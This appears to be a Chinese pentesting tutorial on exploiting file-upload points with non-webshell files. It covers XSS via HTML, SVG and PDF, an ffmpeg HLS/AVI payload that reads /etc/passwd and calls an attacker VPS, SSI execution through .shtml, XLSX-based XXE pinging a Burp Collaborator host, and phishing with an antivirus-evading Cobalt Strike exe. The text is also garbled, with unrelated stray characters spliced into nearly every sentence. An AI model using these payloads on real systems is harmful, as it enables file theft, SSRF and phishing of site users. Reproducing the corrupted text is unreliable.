前言
在滲透測(cè)試中和橙,文件上傳漏洞利用方式一般是上傳可以解析的webshell木馬妹懒,獲取服務(wù)器命令執(zhí)行權(quán)限篓叶,隨著開發(fā)安全意識(shí)和水平的不斷提高艺玲,通過文件上傳直接getshell的情況越來越少,當(dāng)目標(biāo)無法直接上傳getshell時(shí)斑胜,可能還存在其它一些利用方式控淡。
網(wǎng)站腳本文件
常指asp、aspx止潘、jsp掺炭、php后綴的網(wǎng)站腳本文件,通過訪問上傳的webshell執(zhí)行系統(tǒng)命令凭戴,獲取服務(wù)器權(quán)限涧狮。
其它文件利用
當(dāng)文件上傳點(diǎn)無法上傳webshell時(shí),可以通過上傳其它后綴文件構(gòu)造其它漏洞么夫。
html文件
利用方式:上傳html文件構(gòu)造xss漏洞
<script>alert('xss')</script>
svg文件
利用方式:上傳html文件構(gòu)造xss漏洞
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
pdf文件
利用方式:構(gòu)造xss或url跳轉(zhuǎn)的pdf文件上傳
新建一個(gè)空白頁
在“頁面屬性”對(duì)話框單擊“動(dòng)作”標(biāo)簽者冤,再從“選擇動(dòng)作”下拉菜單中選擇“運(yùn)行 JavaScript”命令,然后單擊【添加】按鈕档痪,彈出 JavaScript 編輯器對(duì)話框
在彈出的對(duì)話框中輸入代碼:
app.alert('XSS');
保存上傳到網(wǎng)站上涉枫,使用瀏覽器訪問成功執(zhí)行了xss代碼。
exe文件
利用方式:上傳exe到目標(biāo)網(wǎng)站用于文件釣魚
制作免殺exe cs木馬腐螟,上傳到目標(biāo)網(wǎng)站愿汰,通過社工手段進(jìn)行文件釣魚困后。
mp4、avi文件
利用方式:目標(biāo)使用了ffmpeg有漏洞版本衬廷,上傳mp4/avi進(jìn)行文件讀取/SSRF
內(nèi)容保存成test.avi摇予,上傳到被攻擊服務(wù)器。
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://vps:port/header.m3u8|file:///etc/passwd
#EXT-X-ENDLIST
保存成header.m3u8吗跋,上傳到公網(wǎng)vps
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://vps:port?
訪問上傳的avi文件侧戴,vps接收到訪問日志
shtml文件
利用方式:如果目標(biāo)服務(wù)器開啟了SSI與CGI支持,可以上傳shtml文件小腊,執(zhí)行ssi命令。
搭建測(cè)試環(huán)境:
打開apache的配置文件httpd.conf久窟。找到 LoadModule ssl_module modules/mod_ssl.so 命令秩冈,去掉注釋。
去掉
AddType text/html .shtml
AddOutputFilter INCLUDES .shtml
的注釋
Indexes 或FollowSymLinks修改為:
Options +Indexes +FollowSymLinks +ExecCGI +Includes +IncludesNOEXEC
修改vhosts文件 增加Includes
重啟apache斥扛,上傳shtml文件入问。
成功執(zhí)行了ssi命令。
相關(guān)ssi命令可參考:https://www.secpulse.com/archives/66934.html
xlsx文件
利用方式:當(dāng)遇到接受Excel文件進(jìn)行上傳和處理的目標(biāo)應(yīng)用程序稀颁,則可能存在xxe漏洞芬失。
原理:現(xiàn)代Excel文件實(shí)際上只是XML文檔的zip文件,稱為Office Open XML格式或OOXML匾灶。
當(dāng)應(yīng)用程序處理上傳的xlsx文件時(shí)需要解析XML棱烂,如果解析器未做安全配置,則可能導(dǎo)致xxe漏洞阶女。
創(chuàng)建一個(gè)xlsx文檔颊糜,更改后綴為zip,使用壓縮工具解壓縮秃踩。
打開Burp Suite Professional衬鱼,單擊Burp菜單并選擇“Burp Collaborator client”將其打開,復(fù)制到粘貼板。
找到Content_Types.xml文件憔杨,插入xxe代碼到文件中鸟赫。
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gdx7uyvhtysav8fbqbp8xf5utlzcn1.burpcollaborator.net"> ]>
<x>&xxe;</x>
重新壓縮為zip文件,更改后綴為xlsx消别。
上傳xlsx文檔到目標(biāo)服務(wù)器抛蚤,如果沒有禁用外部實(shí)體,就會(huì)存在XXE漏洞寻狂,burp接收到請(qǐng)求霉颠。
參考鏈接
https://www.freebuf.com/column/142775.html
https://www.secpulse.com/archives/66934.html
https://www.xp.cn/b.php/15190.html
https://www.secpulse.com/archives/45894.html
http://www.xaheimi.com/jianzhan/103.html
http://www.john30n.com/index.php/shentou/44.html
[http://www.john30n.com/index.php/shentou/44.html]
https://xz.aliyun.com/t/3741
